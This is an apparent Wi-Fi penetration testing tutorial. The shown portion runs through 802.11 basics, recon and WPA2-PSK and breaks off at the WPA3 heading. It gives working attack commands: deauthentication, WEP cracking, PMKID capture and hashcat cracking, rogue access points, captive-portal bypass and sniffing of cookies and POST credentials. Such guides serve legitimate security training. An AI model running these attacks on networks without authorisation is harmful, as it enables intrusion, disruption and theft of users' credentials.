Wi-Fi Penetration Testing Guide
From Passive Analysis to Enterprise-Level Attacks
Legal Disclaimer: This guide is published for educational purposes and authorized security assessments only. Performing attacks on networks without explicit written authorization is illegal in most jurisdictions. Use these techniques exclusively on networks you own or in controlled lab environments.
Table of Contents
- 802.11 Fundamentals
- Hardware & Setup
- Monitor Mode & Preparation
- Reconnaissance
- Cipher & Traffic Analysis
- Open Networks (OPN) & OWE
- WEP — Legacy Protocol
- WPA2-PSK
- WPA3-SAE & Dragonblood
- Evil Twin & Evil Portal Attacks
- WPA2/3-Enterprise (MGT) — Reconnaissance
- WPA2/3-Enterprise (MGT) — Attacks
- Advanced Enterprise Attacks
- Post-Exploitation
- Detection & Defense (WIDS)
- Tool Reference
1. 802.11 Fundamentals
1.1 The IEEE 802.11 Standard
IEEE 802.11 is the family of standards governing wireless local area network (WLAN) communications. Transmission occurs over radio frequencies, primarily on:
| Band | Frequencies | Characteristics |
|---|---|---|
| 2.4 GHz | 2400–2483.5 MHz | Longer range, more interference, 14 channels (3 non-overlapping: 1, 6, 11) |
| 5 GHz | 5150–5850 MHz | Shorter range, less congested, more non-overlapping channels |
| 6 GHz | 5925–7125 MHz | Wi-Fi 6E/7, minimal congestion, 59+ non-overlapping channels |
1.2 Frame Types
802.11 frames are divided into three categories:
- Management Frames — control the association lifecycle (Beacon, Probe Request/Response, Authentication, Association, Deauthentication, Disassociation). Unless 802.11w (MFP) is active, these are unencrypted and unauthenticated.
- Control Frames — medium access control (ACK, RTS, CTS)
- Data Frames — carry actual payload (encrypted with session key)
Beacon Frame is broadcast periodically by the AP and contains:
- SSID (may be suppressed/hidden)
- BSSID (AP MAC address)
- Channel number
- Security capabilities (RSN/WPA Information Element)
- Supported cipher suites and AKM suites
- MFP capability flags
1.3 Security Protocol Evolution
WEP (1997) ──► WPA (2003) ──► WPA2 (2004) ──► WPA3 (2018) ──► WPA3-R2 (2022)
RC4/CRC32 TKIP/MIC AES-CCMP SAE/GCMP Mandatory PMF
[BROKEN] [WEAK] [Secure*] [Stronger] [Current]
| Protocol | Cipher | Auth | Key Exchange | Status |
|---|---|---|---|---|
| WEP | RC4 | Open/Shared | Static | Broken — never use |
| WPA-TKIP | RC4+TKIP | PSK / 802.1X | PBKDF2 | Deprecated |
| WPA2-CCMP | AES-CCMP | PSK / 802.1X | PBKDF2 + 4-way | Vulnerable to offline dict |
| WPA3-SAE | AES-GCMP | SAE Dragonfly | DH on EC | Forward-secure |
| WPA3-Enterprise | AES-GCMP-256 | EAP + 192-bit | TLS-based | Current best |
| OWE | AES-CCMP | None | ECDH unauthenticated | No authentication |
1.4 The WPA2 4-Way Handshake
This is the core target for offline password attacks on WPA2-Personal:
Client (Supplicant) AP (Authenticator)
| |
| ◄── M1: ANonce ──────────────── | AP sends random ANonce
| |
| ──► M2: SNonce + MIC ────────── | Client sends SNonce, proves PMK
| | knowledge via MIC
| ◄── M3: GTK + MIC ───────────── | AP sends Group Transient Key
| |
| ──► M4: ACK ─────────────────── | Handshake complete
| |
[ Encrypted data traffic ]
Key derivation chain:
passphrase + SSID ──PBKDF2-SHA1(4096)──► PMK (256-bit)
PMK + ANonce + SNonce + MACs ──PRF-512──► PTK
PTK splits into: KCK (MIC validation) | KEK (key encryption) | TK (data encryption)
Capturing M1+M2 or M2+M3 is sufficient for an offline dictionary attack — no need to stay on the network.
PMKID (clientless variant):
PMKID = HMAC-SHA1-128(PMK, "PMK Name" || BSSID || Client_MAC)
Present in M1 (EAPOL frame from AP). Can be captured without any client association.
1.5 WPA3-SAE (Dragonfly Handshake)
SAE uses an elliptic curve Diffie-Hellman variant called Dragonfly:
Client AP
| |
| ──► Commit (scalar, element) ──► | Both derive shared secret
| ◄── Commit (scalar, element) ─── | independently
| |
| ──► Confirm (verifier) ────────► | Mutual authentication
| ◄── Confirm (verifier) ────────── |
| |
[ PMK derived, proceed to 4-way ]
Key differences from WPA2:
- No capturable hash for offline cracking — every attempt requires network interaction
- Forward secrecy: each session uses unique ephemeral keys
- Simultaneous authentication: both sides prove knowledge of the password equally
1.6 WPA2/3-Enterprise (802.1X / EAP)
Enterprise networks use a RADIUS server and EAP for per-user authentication:
Client ──── EAP Start ─────────────► AP ──── RADIUS Access-Request ────► RADIUS
Client ◄─── EAP Identity Request ─── AP Server
Client ──── EAP Identity Response ──► AP ──── (relayed) ───────────────►
Client ◄─── EAP Challenge ────────── AP ◄─── RADIUS Access-Challenge ────
Client ──── EAP Response ────────── ► AP ──── (relayed) ───────────────►
Client ◄─── EAP-Success ─────────── AP ◄─── RADIUS Access-Accept ───────
Common EAP Methods:
| Method | Inner Auth | TLS Tunnel | Server Cert Verified | Attack Surface |
|---|---|---|---|---|
| EAP-TLS | Certificate | Yes | Yes (client cert too) | Requires stolen cert |
| PEAP/MSCHAPv2 | Password | Yes | Only if configured | Rogue AP → MSCHAPv2 hash |
| EAP-TTLS/PAP | Password | Yes | Only if configured | Rogue AP → cleartext password |
| EAP-MD5 | Password | None | No | Trivially crackable |
| LEAP (Cisco) | Password | None | No | Dictionary attack |
MSCHAPv2 is the most common inner authentication in enterprise environments. If the client does not validate the server certificate, a Rogue AP captures the challenge-response pair, which can be cracked offline with hashcat mode 5500/5600.
2. Hardware & Setup
2.1 Wi-Fi Adapter Requirements
For Wi-Fi penetration testing you need an adapter with:
- Monitor mode — receive all frames regardless of destination MAC
- Packet injection — inject arbitrary 802.11 frames into the air
Most built-in laptop cards do not support these. External USB adapters are required.
Recommended chipsets (2024/2025):
| Adapter | Chipset | Bands | Notes |
|---|---|---|---|
| Alfa AWUS036ACM | MT7612U | 2.4/5 GHz | Rock-solid in-kernel driver, best all-round |
| Alfa AWUS036AXML | MT7921AU | 2.4/5/6 GHz | Wi-Fi 6E support, modern |
| Alfa AWUS036ACH | RTL8812AU | 2.4/5 GHz | Requires external driver (aircrack-ng/rtl8812au) |
| Alfa AWUS036ACHM | MT7610U | 2.4/5 GHz | Stable, good injection |
| Panda PAU09 | RT5572 | 2.4/5 GHz | Budget option, stable |
| TP-Link Archer T4U | RTL8812AU | 2.4/5 GHz | Common, needs external driver |
Test injection capability:
sudo aireplay-ng --test wlan0
# Output should show: Injection is working!
2.2 Essential Tool Installation
# Core suite
sudo apt update && sudo apt install -y \
aircrack-ng \
hashcat \
hcxtools \
hcxdumptool \
wireshark \
tshark \
mdk4 \
hostapd \
dnsmasq \
macchanger \
arp-scan \
net-tools \
iw \
wireless-tools \
python3-pip \
libssl-dev \
pkg-config
# wifiphisher — automated Evil Twin + captive portal phishing
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher && sudo python3 setup.py install
# fluxion — Evil Twin framework with captive portal
git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion && sudo bash fluxion.sh --install
# eaphammer — Enterprise Evil Twin (EAP credential harvesting)
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer && sudo bash kali-setup.sh
# hostapd-mana — Rogue AP with PSK capture
sudo apt install -y hostapd-mana
# berate_ap — Advanced Rogue AP for relay attacks
git clone https://github.com/sensepost/berate_ap.git
# wpa_sycophant — MSCHAPv2 relay
git clone https://github.com/sensepost/wpa_sycophant.git
# wacker — WPA3-SAE online brute-force
git clone https://github.com/blunderbuss-wctf/wacker.git
cd wacker && pip3 install -r requirements.txt
# air-hammer — Enterprise brute-force / password spray
git clone https://github.com/Wh1t3Rh1n0/air-hammer.git
# EAP_buster — EAP method enumeration
git clone https://github.com/rek7/EAP_buster.git
# wifi_db — capture aggregation and analysis
git clone https://github.com/r4ulcl/wifi_db.git
pip3 install -r wifi_db/requirements.txt
2.3 Adapter Verification
# List wireless interfaces
iw dev
# Check capabilities (monitor mode, injection)
iw phy phy0 info | grep -E "monitor|* 2484"
# Identify chipset via USB
lsusb
# Kernel messages about the adapter
dmesg | grep -iE "wlan|802.11|wireless" | tail -20
# Driver information
ethtool -i wlan0 2>/dev/null | grep driver
3. Monitor Mode & Preparation
3.1 What Monitor Mode Does
In managed mode the adapter only processes frames addressed to its MAC. In monitor mode it captures every frame in range: beacons, probe requests, data frames, management frames — from all networks simultaneously on the tuned channel.
3.2 Enabling Monitor Mode
Method 1 — airmon-ng (recommended for aircrack-ng suite):
# Kill processes that hold the wireless interface
sudo airmon-ng check kill
# Create monitor interface
sudo airmon-ng start wlan0
# New interface: wlan0mon
# Verify
iwconfig wlan0mon
# Should show: Mode:Monitor
Method 2 — iw (manual control, more precise):
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
iwconfig wlan0
Lock to a specific channel:
sudo iwconfig wlan0mon channel 6
# or
sudo iw dev wlan0mon set channel 6 HT20
Disabling monitor mode:
sudo airmon-ng stop wlan0mon
sudo systemctl start NetworkManager
3.3 MAC Address Management
sudo systemctl stop NetworkManager
sudo ip link set wlan1 down
# Show current MAC
macchanger --show wlan1
# Random vendor-compliant MAC
sudo macchanger -r wlan1
# Set specific MAC (e.g., impersonate a client)
sudo macchanger -m AA:BB:CC:DD:EE:FF wlan1
# Restore permanent hardware MAC
sudo macchanger -p wlan1
sudo ip link set wlan1 up
3.4 Project Workspace
mkdir -p ~/wifi/{captures,hashes,certs,logs,configs,wordlists}
cd ~/wifi
4. Reconnaissance
4.1 Goals
Reconnaissance is the foundation of every Wi-Fi assessment. Before any active attack, you need:
- Complete map of APs in range: SSID, BSSID, channel, security type, cipher, AKM
- List of associated clients and their MAC addresses
- Probe Requests from clients (reveal networks they have previously connected to)
- Hidden SSID discovery
- Vendor identification (can hint at default credentials)
- WPS status (potential attack vector)
- Signal strength and physical positioning of targets
4.2 Passive Scanning with airodump-ng
# Full multi-band scan (save captures for later analysis)
sudo airodump-ng wlan0mon \
-w ~/wifi/captures/scan \
--output-format pcap,csv \
--manufacturer \
--wps \
--band abg
# Focus on a specific channel (more data on that channel)
sudo airodump-ng wlan0mon \
-c 6 \
--bssid <TARGET_BSSID> \
-w ~/wifi/captures/target_ch6 \
--manufacturer --wps
# 5 GHz only
sudo airodump-ng wlan0mon \
-w ~/wifi/captures/scan5 \
--manufacturer --wps \
--band a
Reading airodump-ng output:
BSSID PWR Beacons #Data CH MB ENC CIPHER AUTH ESSID
F0:9F:C2:71:22:12 -42 145 523 6 54e WPA2 CCMP PSK corp-wifi
F0:9F:C2:6A:88:26 -67 89 0 11 54e WPA2 CCMP PSK <length: 0>
AA:BB:CC:DD:EE:01 -55 34 0 6 54e WPA3 CCMP SAE home-net
BB:CC:DD:EE:FF:02 -71 21 5 1 54e OPN OPN free-wifi
BSSID STATION PWR Rate Lost Frames Probe
F0:9F:C2:71:22:12 78:C1:A7:BF:72:46 -55 54-11 0 234 office-backup,home-wifi
(not associated) AA:BB:CC:11:22:33 -60 0- 1 0 12 starbucks,airport-free
Key fields:
#Data— data frames captured; high count = active client (good target for injection)ESSID <length: 0>— hidden SSID, length reveals the character countProbe— networks the client has previously connected to (attack surface for Evil Twin)ENC OPN— open/unencrypted network
4.3 Hidden SSID Discovery
Method 1 — Wait for a natural client reconnection (completely passive):
# Keep airodump-ng running; when a client connects, the Probe Response reveals the SSID
sudo airodump-ng wlan0mon --band abg -w ~/wifi/captures/passive
Method 2 — Active deauthentication of an associated client:
# Kick a client off the AP; its Probe Request during reconnect reveals the SSID
sudo aireplay-ng -0 5 -a <AP_BSSID> -c <CLIENT_MAC> wlan0mon
Method 3 — ESSID brute-force with mdk4:
# Build a targeted wordlist
cat /usr/share/wordlists/rockyou.txt | awk '{print "corp-" $1}' \
> ~/wifi/wordlists/prefixed.txt
# Fix the monitor interface on the target channel first
sudo iwconfig wlan0mon channel 11
# Probe each SSID until the AP responds
sudo mdk4 wlan0mon p \
-t <AP_BSSID> \
-f ~/wifi/wordlists/prefixed.txt
4.4 WPS Enumeration
# Identify WPS-enabled APs
sudo wash -i wlan0mon --scan
# WPS PIN brute-force (slow, rate-limited by most modern APs)
sudo reaver -i wlan0mon -b <BSSID> -vv -N
# Pixie Dust attack (offline; works on specific chipsets: Ralink, Realtek, Broadcom older FW)
sudo reaver -i wlan0mon -b <BSSID> -vv -K 1
# Bully as an alternative
sudo bully wlan0mon -b <BSSID> -d -v 3
4.5 Aggregated Analysis with wifi_db
cd ~/tools/wifi_db
# Import all captures into a SQLite database
python3 wifi_db.py -d ~/wifi/analysis.sqlite ~/wifi/captures/
# GUI browser
sqlitebrowser ~/wifi/analysis.sqlite
# Useful queries via CLI
sqlite3 ~/wifi/analysis.sqlite \
"SELECT ESSID, BSSID, Channel, Security, Cipher FROM APs ORDER BY Power DESC;"
sqlite3 ~/wifi/analysis.sqlite \
"SELECT Station, BSSID, Probe FROM Clients WHERE Probe != '' ORDER BY Probe;"
5. Cipher & Traffic Analysis
5.1 Why Cipher Analysis Matters
Before launching any attack, understanding what cipher suites are negotiated tells you:
- Which cryptographic algorithms protect the traffic (TKIP is weak, CCMP/GCMP are strong)
- Whether Management Frame Protection (MFP / 802.11w) is required — blocks deauthentication attacks
- The exact AKM suite (PSK, SAE, EAP, OWE) — determines which attacks are applicable
- Whether PMKID is likely to be present in EAPOL M1 frames
- Whether downgrade from WPA3 to WPA2 is feasible (transition mode)
5.2 Reading the RSN Information Element
Every WPA2/WPA3 beacon contains a Robust Security Network (RSN) IE that advertises supported cipher and AKM suites. You can extract it passively:
With Wireshark:
Filter: wlan.fc.type_subtype == 8 && wlan.ssid == "TARGET_SSID"
Expand: IEEE 802.11 wireless LAN → Tagged parameters → RSN Information
Fields to examine:
RSN Information
├── Version: 1
├── Group Cipher Suite: 00-0f-ac-4 (CCMP-128) or 00-0f-ac-2 (TKIP)
├── Pairwise Cipher Suites
│ ├── 00-0f-ac-4 → CCMP-128 (WPA2 standard)
│ ├── 00-0f-ac-8 → GCMP-128 (WPA3)
│ ├── 00-0f-ac-9 → GCMP-256 (WPA3-Enterprise 192-bit)
│ └── 00-0f-ac-2 → TKIP (legacy, weak)
├── AKM Suite List
│ ├── 00-0f-ac-2 → PSK (WPA2-Personal)
│ ├── 00-0f-ac-8 → SAE (WPA3-Personal)
│ ├── 00-0f-ac-18 → OWE (Enhanced Open)
│ └── 00-0f-ac-1 → 802.1X (Enterprise)
└── RSN Capabilities
├── Pre-Auth: 0
├── No Pairwise: 0
├── PTKSA Replay Counter: 3
├── GTKSA Replay Counter: 3
├── MFP Required: [0=off / 1=mandatory] ← KEY: if 1, deauth attacks FAIL
└── MFP Capable: [0=off / 1=supported]
With tshark (batch extraction):
# Extract RSN info from all beacons in a capture
tshark -r ~/wifi/captures/scan-01.cap \
-Y "wlan.fc.type_subtype == 8" \
-T fields \
-e wlan.ssid \
-e wlan.rsn.pcs.list \
-e wlan.rsn.akms.list \
-e wlan.rsn.capabilities \
2>/dev/null | sort -u
# Check MFP status for a specific BSSID
tshark -r ~/wifi/captures/scan-01.cap \
-Y "wlan.bssid == <BSSID> && wlan.fc.type_subtype == 8" \
-T fields \
-e wlan.ssid \
-e wlan.rsn.capabilities.mfpr \
-e wlan.rsn.capabilities.mfpc \
2>/dev/null
# mfpr=1 means deauth attacks are BLOCKED (802.11w mandatory)
Check transition mode (WPA2 + WPA3 simultaneously):
# If an AP supports both PSK (AKM 2) and SAE (AKM 8), it's in transition mode
# → downgrade to WPA2 is possible
tshark -r ~/wifi/captures/scan-01.cap \
-Y "wlan.bssid == <BSSID> && wlan.fc.type_subtype == 8" \
-T fields -e wlan.rsn.akms.list 2>/dev/null
5.3 Cipher Suite Summary Table
| OUI-Suite | Cipher | Protocol | Security Level |
|---|---|---|---|
| 00-0f-ac-1 | WEP-40 | WEP | Broken |
| 00-0f-ac-2 | TKIP | WPA | Weak |
| 00-0f-ac-4 | CCMP-128 (AES) | WPA2 | Good |
| 00-0f-ac-8 | GCMP-128 | WPA3 | Strong |
| 00-0f-ac-9 | GCMP-256 | WPA3-Ent 192-bit | Very Strong |
| 00-0f-ac-10 | CCMP-256 | WPA3 | Strong |
AKM Suite OUI:
| OUI-Suite | Key Management | Protocol |
|---|---|---|
| 00-0f-ac-1 | 802.1X (EAP) | WPA2-Enterprise |
| 00-0f-ac-2 | PSK | WPA2-Personal |
| 00-0f-ac-8 | SAE | WPA3-Personal |
| 00-0f-ac-18 | OWE | Enhanced Open |
| 00-0f-ac-13 | 802.1X Suite-B | WPA3-Enterprise |
5.4 Decrypting WPA2 Traffic in Wireshark
If you have captured the 4-way handshake and know the passphrase, Wireshark can decrypt the session in real time:
Edit → Preferences → Protocols → IEEE 802.11
[x] Enable decryption
Decryption Keys → Edit → [+]
Key type: wpa-pwd
Key: YourPassphrase:SSID_Name
Or use wpa-psk with the pre-computed PMK (hex):
# Compute PMK from passphrase+SSID
wpa_passphrase "SSID_NAME" "passphrase" | grep psk
# Copy the hex value as wpa-psk in Wireshark
With tshark (command line):
# Decrypt inline using passphrase
tshark -r ~/wifi/captures/target-01.cap \
-o "wlan.enable_decryption:TRUE" \
-o "uat:80211_keys:\"wpa-pwd\",\"passphrase:SSID\"" \
-Y "http || dns || ftp" \
-T fields -e frame.time -e ip.src -e ip.dst -e http.host -e dns.qry.name \
2>/dev/null
# Decrypt with raw PMK
tshark -r ~/wifi/captures/target-01.cap \
-o "wlan.enable_decryption:TRUE" \
-o "uat:80211_keys:\"wpa-psk\",\"PMK_HEX_STRING\"" \
-Y "http" 2>/dev/null
With airdecap-ng:
# Generates a new *-dec.cap file with decrypted frames
airdecap-ng \
-e "SSID_NAME" \
-p "passphrase" \
~/wifi/captures/target-01.cap
# For WEP
airdecap-ng -w <WEP_KEY_HEX> ~/wifi/captures/wep-01.cap
# Open the decrypted capture
wireshark ~/wifi/captures/target-01-dec.cap
5.5 Identifying EAPOL Frames and Handshake Quality
# Count EAPOL frames per BSSID (each complete handshake = 4 frames)
tshark -r ~/wifi/captures/target-01.cap \
-Y "eapol" \
-T fields -e wlan.bssid -e eapol.keydes.type \
2>/dev/null | sort | uniq -c
# Validate handshake quality with aircrack-ng
aircrack-ng ~/wifi/captures/target-01.cap
# Look for: "1 handshake" in the AP list
# "No valid WPA handshakes found" = capture is incomplete
# Check if PMKID is present in the capture
hcxpcapngtool ~/wifi/captures/target-01.cap -o /dev/null --info=stdout 2>/dev/null | \
grep -E "PMKID|EAPOL"
5.6 Extracting EAP Certificates from Captures
Enterprise APs transmit their TLS certificate in cleartext during authentication:
# Extract all TLS certificate fields from a capture (via tshark)
tshark -r ~/wifi/captures/mgt-01.cap \
-Y "tls.handshake.type == 11" \
-T fields \
-e x509sat.uTF8String \
-e x509sat.IA5String \
-e x509ce.dNSName \
2>/dev/null | sort -u
# Wireshark filter for certificate exchange
# (wlan.sa == <AP_BSSID>) && (tls.handshake.certificate)
# Extract Subject/Issuer fields
tshark -r ~/wifi/captures/mgt-01.cap \
-Y "wlan.bssid == <BSSID> && x509sat.IA5String" \
-T fields -e x509sat.IA5String 2>/dev/null
5.7 Detecting Deauthentication Attacks in Captures
# Count deauth frames by source (high count = active attack in progress)
tshark -r ~/wifi/captures/scan-01.cap \
-Y "wlan.fc.type_subtype == 12 || wlan.fc.type_subtype == 10" \
-T fields -e wlan.sa -e wlan.da -e wlan.fc.type_subtype \
2>/dev/null | sort | uniq -c | sort -rn | head -20
# Filter for broadcast deauth (affects all clients)
tshark -r ~/wifi/captures/scan-01.cap \
-Y "wlan.fc.type_subtype == 12 && wlan.da == ff:ff:ff:ff:ff:ff" \
2>/dev/null
6. Open Networks (OPN) & OWE
6.1 Theory
OPN (Open): No encryption, no authentication. All frames are transmitted in cleartext. Anyone within radio range can capture all traffic passively.
OWE (Opportunistic Wireless Encryption / “Enhanced Open”): WPA3 enhancement that provides per-client encryption on open networks via unauthenticated ECDH. Protects against passive eavesdropping but does not authenticate the AP — still vulnerable to Evil Twin.
Attack surface on OPN:
- Passive traffic interception
- HTTP session hijacking (cookie theft)
- Captive portal bypass via MAC spoofing
- DNS poisoning
6.2 Connecting to an Open Network
cat > ~/wifi/configs/open.conf << 'EOF'
network={
ssid="TARGET_SSID"
key_mgmt=NONE
}
EOF
sudo wpa_supplicant -Dnl80211 -iwlan2 -c ~/wifi/configs/open.conf -B
sudo dhclient wlan2 -v
For hidden open networks:
cat > ~/wifi/configs/open_hidden.conf << 'EOF'
network={
ssid="HIDDEN_SSID"
key_mgmt=NONE
scan_ssid=1
}
EOF
sudo wpa_supplicant -Dnl80211 -iwlan2 -c ~/wifi/configs/open_hidden.conf -B
sudo dhclient wlan2 -v
6.3 Captive Portal Bypass via MAC Spoofing
Captive portals commonly whitelist clients by MAC address. If an already-authorized client is visible in the airodump-ng client list with active traffic, spoofing its MAC grants immediate portal bypass:
# Step 1: Identify an authorized client from the capture
sudo airodump-ng wlan0mon -c <CHANNEL> -w ~/wifi/captures/portal_recon
# Look in the STATION section for clients with #Data > 0
# Step 2: Stop NetworkManager, spoof the authorized MAC
sudo systemctl stop NetworkManager
sudo ip link set wlan2 down
sudo macchanger -m <AUTHORIZED_CLIENT_MAC> wlan2
sudo ip link set wlan2 up
# Step 3: Connect with the spoofed MAC
sudo wpa_supplicant -Dnl80211 -iwlan2 -c ~/wifi/configs/open.conf -B
sudo dhclient -v wlan2
# The captive portal now treats you as already-authorized
6.4 Credential Sniffing on Open Networks
# Capture all traffic on the open network channel
sudo airodump-ng wlan0mon -c <CHANNEL> -w ~/wifi/captures/opn_sniff
# Extract HTTP POST bodies (credentials, tokens)
tshark -r ~/wifi/captures/opn_sniff-01.cap \
-Y "http.request.method == POST" \
-T fields \
-e ip.src -e http.host -e http.request.uri -e http.file_data \
2>/dev/null
# Extract HTTP cookies
tshark -r ~/wifi/captures/opn_sniff-01.cap \
-Y "http.cookie" \
-T fields -e ip.src -e http.host -e http.cookie \
2>/dev/null
# DNS queries (reveals what clients are browsing)
tshark -r ~/wifi/captures/opn_sniff-01.cap \
-Y "dns.flags.response == 0" \
-T fields -e ip.src -e dns.qry.name \
2>/dev/null | sort -u
6.5 OWE Downgrade Attack
OWE networks often run in transition mode alongside a regular OPN SSID for backward compatibility. Since OWE provides no AP authentication, an Evil Twin with a higher signal is undetectable:
# An OWE AP in transition mode broadcasts two BSSIDs:
# 1. OPN SSID (e.g., "CafeWifi") ← unauthenticated, visible to all clients
# 2. OWE SSID (hidden, linked to OPN) ← encrypted, auto-negotiated
# Attack: create a stronger OPN AP with the same SSID
# Clients connecting in OPN mode will see your AP instead
# See Section 10 (Evil Twin) for the full rogue AP setup
7. WEP — Legacy Protocol
7.1 Theory
WEP uses RC4 stream cipher with a 24-bit Initialization Vector (IV) prepended to the key. Critical weaknesses:
- IVs are only 24 bits → after ~16 million packets, collisions are statistically guaranteed
- Weak IVs (certain IV patterns) directly leak key bytes — FMS/KoreK attack
- CRC-32 integrity check is linear → bit-flipping attacks without detection
- No replay protection
In practice, with ~50,000–100,000 captured IVs, the key is recoverable in seconds with aircrack-ng.
7.2 Automated Attack with besside-ng
# Kill interfering processes first
sudo airmon-ng check kill
# besside-ng handles everything: capture, replay, and crack
# -c: channel, -b: target BSSID
sudo besside-ng -c <CHANNEL> -b <AP_BSSID> wlan2 -v
# Results saved to:
# wep.cap → capture file
# wep.log → discovered keys
7.3 Manual Attack (Step by Step)
Step 1 — Capture IVs:
sudo airodump-ng \
-c <CHANNEL> \
--bssid <AP_BSSID> \
-w ~/wifi/captures/wep \
wlan0mon
Step 2 — Fake Authentication (required for injection):
# Associate to the AP without knowing the key
# -1: fake auth, 3600: re-auth period, -q 10: keepalive, -a: AP BSSID
sudo aireplay-ng -1 3600 -q 10 -a <AP_BSSID> wlan0mon
# Look for: "Association successful"
Step 3 — ARP Request Replay (accelerate IV generation):
# Capture a real ARP request and replay it rapidly to generate new IVs
# -b: AP BSSID, -h: our MAC (used in fake auth)
sudo aireplay-ng --arpreplay -b <AP_BSSID> -h <OUR_MAC> wlan0mon
Step 4 — Crack (run in parallel with capture):
# aircrack-ng attempts statistical key recovery
# Works from ~20,000 IVs, reliable at 50,000+
sudo aircrack-ng ~/wifi/captures/wep-01.cap
7.4 Connect to a WEP Network
cat > ~/wifi/configs/wep.conf << 'EOF'
network={
ssid="TARGET_SSID"
key_mgmt=NONE
wep_key0=AABBCCDDEEFF
wep_tx_keyidx=0
}
EOF
sudo wpa_supplicant -D nl80211 -i wlan2 -c ~/wifi/configs/wep.conf -B
sudo dhclient wlan2 -v
8. WPA2-PSK
8.1 Attack Surface Overview
WPA2-Personal offers two crackable artifacts:
- 4-Way Handshake — requires a client to associate; offline dictionary attack
- PMKID — present in EAPOL M1 from any AP; no client needed
Both require the password not to be in your wordlist to fail. There is no way to break AES-CCMP directly — it is the passphrase derivation (PBKDF2) that is targeted.
8.2 Capturing the 4-Way Handshake
Passive (wait for organic association):
sudo airodump-ng wlan0mon \
-c <CHANNEL> \
--bssid <AP_BSSID> \
-w ~/wifi/captures/psk_target
Active (force reconnection via deauthentication):
# Terminal 1: keep capturing
sudo airodump-ng wlan0mon -c <CHANNEL> --bssid <AP_BSSID> \
-w ~/wifi/captures/psk_target
# Terminal 2: deauth — client will reconnect and handshake is captured
# -0: deauth, 10: frame count (0=continuous), -a: AP, -c: specific client
sudo aireplay-ng -0 10 -a <AP_BSSID> -c <CLIENT_MAC> wlan0mon
# Deauth all clients (broadcast)
sudo aireplay-ng -0 10 -a <AP_BSSID> wlan0mon
Verify the handshake was captured:
aircrack-ng ~/wifi/captures/psk_target-01.cap
# Line in AP list should show: "1 handshake"
8.3 PMKID Attack (Clientless)
The PMKID is embedded in the first EAPOL frame sent by the AP during any association attempt. You do not need a client to be present.
# Method 1: hcxdumptool (most efficient — captures PMKID + handshakes simultaneously)
# hcxdumptool automatically sends association requests to trigger PMKID
sudo hcxdumptool \
-i wlan0mon \
--enable_status=3 \
-o ~/wifi/captures/pmkid.pcapng
# For targeted scan (filterfile contains one BSSID per line in lowercase, no colons)
echo "f09fc2711222" > ~/wifi/target_bssid.txt
sudo hcxdumptool \
-i wlan0mon \
--enable_status=3 \
--filterlist_ap=~/wifi/target_bssid.txt \
--filtermode=2 \
-o ~/wifi/captures/pmkid.pcapng
# Convert to hashcat mode 22000 (current standard — replaces deprecated 16800)
hcxpcapngtool \
~/wifi/captures/pmkid.pcapng \
-o ~/wifi/hashes/hash.hc22000
# Verify: a valid hash has 4 colon-separated fields
head -3 ~/wifi/hashes/hash.hc22000
# Format: PMKID_or_MIC*AP_MAC*CLIENT_MAC*SSID_HEX
8.4 Converting Legacy Formats
# If you have an old .hccapx from hostapd-mana or older tools
# Step 1: hccapx → pcap
hcxhash2cap --hccapx=captured.hccapx -c ~/wifi/hashes/legacy.pcap
# Step 2: pcap → mode 22000
hcxpcapngtool ~/wifi/hashes/legacy.pcap -o ~/wifi/hashes/legacy.hc22000
8.5 Password Cracking with hashcat
# ── Dictionary attack ──────────────────────────────────────────────
hashcat -a 0 -m 22000 ~/wifi/hashes/hash.hc22000 \
/usr/share/wordlists/rockyou.txt
# ── Dictionary + rules (best64 covers common transformations) ──────
hashcat -a 0 -m 22000 ~/wifi/hashes/hash.hc22000 \
/usr/share/wordlists/rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule
# ── Combinator (two wordlists joined) ─────────────────────────────
hashcat -a 1 -m 22000 ~/wifi/hashes/hash.hc22000 \
wordlist1.txt wordlist2.txt
# ── Hybrid: wordlist + mask suffix (e.g. word + 4 digits) ─────────
hashcat -a 6 -m 22000 ~/wifi/hashes/hash.hc22000 \
/usr/share/wordlists/rockyou.txt "?d?d?d?d"
# ── Pure brute-force (8-char, lower + digits) ─────────────────────
hashcat -a 3 -m 22000 ~/wifi/hashes/hash.hc22000 \
-1 ?l?d "?1?1?1?1?1?1?1?1"
# ── Benchmark your GPU speed ──────────────────────────────────────
hashcat -b -m 22000
Mode quick reference:
22000 → WPA-PBKDF2-PMKID+EAPOL (current, unified) ← USE THIS
22001 → WPA-PMK-PMKID+EAPOL (if PMK is known)
2500 → WPA-EAPOL-PBKDF2 (deprecated, still works)
16800 → WPA-PMKID-PBKDF2 (deprecated, use 22000)
8.6 Rogue AP for Offline Networks (hostapd-mana)
If a network is not broadcasting (client only searches via Probe Requests), set up a Rogue AP with the same SSID to capture the handshake:
cat > ~/wifi/configs/rogue_psk.conf << 'EOF'
interface=wlan1
driver=nl80211
hw_mode=g
channel=6
ssid=TARGET_HIDDEN_SSID
mana_wpaout=/root/wifi/hashes/mana_captured.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=00000000
EOF
sudo hostapd-mana ~/wifi/configs/rogue_psk.conf
# Wait for: AP-STA-POSSIBLE-PSK-MISMATCH → client connected, hash captured → CTRL+C
# Convert and crack
hcxhash2cap --hccapx=~/wifi/hashes/mana_captured.hccapx \
-c ~/wifi/hashes/mana.pcap
hcxpcapngtool ~/wifi/hashes/mana.pcap -o ~/wifi/hashes/mana.hc22000
hashcat -a 0 -m 22000 ~/wifi/hashes/mana.hc22000 /usr/share/wordlists/rockyou.txt
8.7 Traffic Decryption
# Decrypt entire capture once password is known
airdecap-ng \
-e "TARGET_SSID" \
-p "recovered_password" \
~/wifi/captures/psk_target-01.cap
# Output: psk_target-01-dec.cap
# Analyze decrypted traffic
wireshark ~/wifi/captures/psk_target-01-dec.cap
# Extract HTTP hosts visited
tshark -r ~/wifi/captures/psk_target-01-dec.cap \
-Y "http.host" \
-T fields -e ip.src -e http.host -e http.request.uri 2>/dev/null
8.8 Connect with Known Password
cat > ~/wifi/configs/psk.conf << 'EOF'
network={
ssid="TARGET_SSID"
psk="recovered_password"
key_mgmt=WPA-PSK
proto=WPA2
scan_ssid=1
}
EOF
sudo wpa_supplicant -Dnl80211 -iwlan3 -c ~/wifi/configs/psk.conf -B
sudo dhclient wlan3 -v
9. WPA3-SAE & Dragonblood
9.1 Theory
